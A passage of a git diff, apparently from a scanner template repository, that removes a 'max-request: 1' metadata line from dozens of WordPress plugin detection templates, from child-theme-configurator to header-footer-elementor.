b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index 425adf0bfe..e555bf93d3 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: - max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 23a88ea130..88d38e21ed 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 575c9ebe67..840c086fb9 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ 